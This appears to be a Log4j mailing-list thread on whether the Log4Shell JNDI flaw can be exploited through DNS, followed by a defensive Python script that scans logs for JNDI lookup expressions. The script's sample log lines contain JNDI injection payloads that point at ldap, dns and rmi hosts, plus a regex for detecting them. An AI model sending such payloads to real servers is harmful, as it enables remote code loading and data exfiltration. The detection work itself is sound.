JNDI supports DNS as one of its protocols, but I've never confirmed that you can load anything malicious through it. I've assumed it's possible, though. I don't know if whitelisting DNS servers is sufficient due to recursive DNS resolution in the protocol itself.
On Tue, Dec 14, 2021 at 2:35 PM <r.barc...@habmalnefrage.de> wrote:
>
> Dear log4j experts,
>
> It's sad that this nice project gets so much negative attention because of
> the current security issue.
>
> I have a question to analyse the impact for me:
>
> I've been using Log4j2 in a web application run in Tomcat 9.0 (always latest
> version).
> On my Linux machine, this Tomcat instance runs as a dedicated user (e.g.
> "tomcatappuser").
> Through iptables this user has never been allowed to make any outgoing
> connections to the Internet except for a few whitelisted IP addresses of used
> REST interfaces. So the web application was never able to connect to
> arbitrary external IP addresses through any port (HTTP, LDAP, ...). No
> outgoing TCP, UDP or ICMP connections possible except to whitelisted
> trustworthy IP addresses.
>
> BUT it was allowed to resolve host names through 2 whitelisted DNS server IP
> addresses (let's say e.g. 8.8.8.8).
> Now I've even blocked that and put the host name / IP address mappings of the
> used REST endpoints into /etc/hosts.
>
> I have no indication that the Log4j vulnerability actually has been exploited
> on my system to do any harm.
> But could a malicious payload have arrived on my system inside the DNS
> response of my legitimate DNS server?
> I'm thinking of a TXT record that might contain a serialized Java object...?
> Was this also possible through this lookup expression resolution flaw?
>
> Thanks in advance for your thoughts!
> Reg
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
> For additional commands, e-mail: log4j-user-h...@logging.apache.org
> ---------------------------------------------------------------------
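A defender-side check for the situation discussed in this thread, added here as an example and not part of either message: the Python script below scans access-log-style lines for JNDI lookup expressions and, for each one, records the scheme and the host name whose resolution the lookup would trigger, since even a DNS-only egress policy lets that name reach the resolver (and, through recursion, the name's authoritative server). The log lines, host names, IP addresses and the allowlist are constructed for the example.

```python
import re

# Sample log lines constructed for this example (documentation-range IP, names under .test).
SAMPLE_LOG = [
    '2021-12-14 14:35:01 INFO  http-nio-8080-exec-1 GET /index.html 200 ua="Mozilla/5.0"',
    '2021-12-14 14:35:02 INFO  http-nio-8080-exec-2 GET /search?q=${jndi:ldap://203.0.113.10:1389/o} 200',
    '2021-12-14 14:35:03 INFO  http-nio-8080-exec-3 GET / 200 ua="${JNDI:dns://lookup.untrusted.test/txt}"',
    '2021-12-14 14:35:04 INFO  http-nio-8080-exec-4 GET /api 200 ua="${jndi:rmi://internal-svc.corp.test/x}"',
]

# "${jndi:<scheme>:<rest>}" as the lookup expression is written; the lookup key and the
# scheme are matched case-insensitively here so that upper-case variants are not missed.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(//)?([^/:}\s]+)([^}]*)\}", re.IGNORECASE)


def find_jndi_lookups(line):
    """Return (scheme, host) pairs for every JNDI lookup expression found in one log line."""
    return [(m.group(1).lower(), m.group(3).lower()) for m in JNDI_RE.finditer(line)]


def classify(scheme, host, allowed_hosts):
    """Explain why the lookup matters behind an egress firewall that permits only DNS.

    Every scheme starts with a name resolution, so a lookup naming a host outside the
    allowlist hands an attacker-chosen name to the recursive resolver, which forwards it
    to that name's authoritative server: the queried name itself is an outbound channel.
    """
    if host in allowed_hosts:
        return "allowlisted host: review, but expected"
    if scheme == "dns":
        return "dns lookup: resolver forwards the query to the authoritative server for this name"
    return f"{scheme} lookup: name resolved first, then a TCP connect that egress rules must block"


def scan(lines, allowed_hosts):
    """Scan log lines and return one finding per lookup expression."""
    findings = []
    for n, line in enumerate(lines, 1):
        for scheme, host in find_jndi_lookups(line):
            findings.append({"line": n, "scheme": scheme, "host": host,
                             "note": classify(scheme, host, allowed_hosts)})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, {"internal-svc.corp.test"}):
        print(finding)
```

Run it against real log files by replacing SAMPLE_LOG with the file's lines and the allowlist with the REST endpoint names the application is expected to resolve.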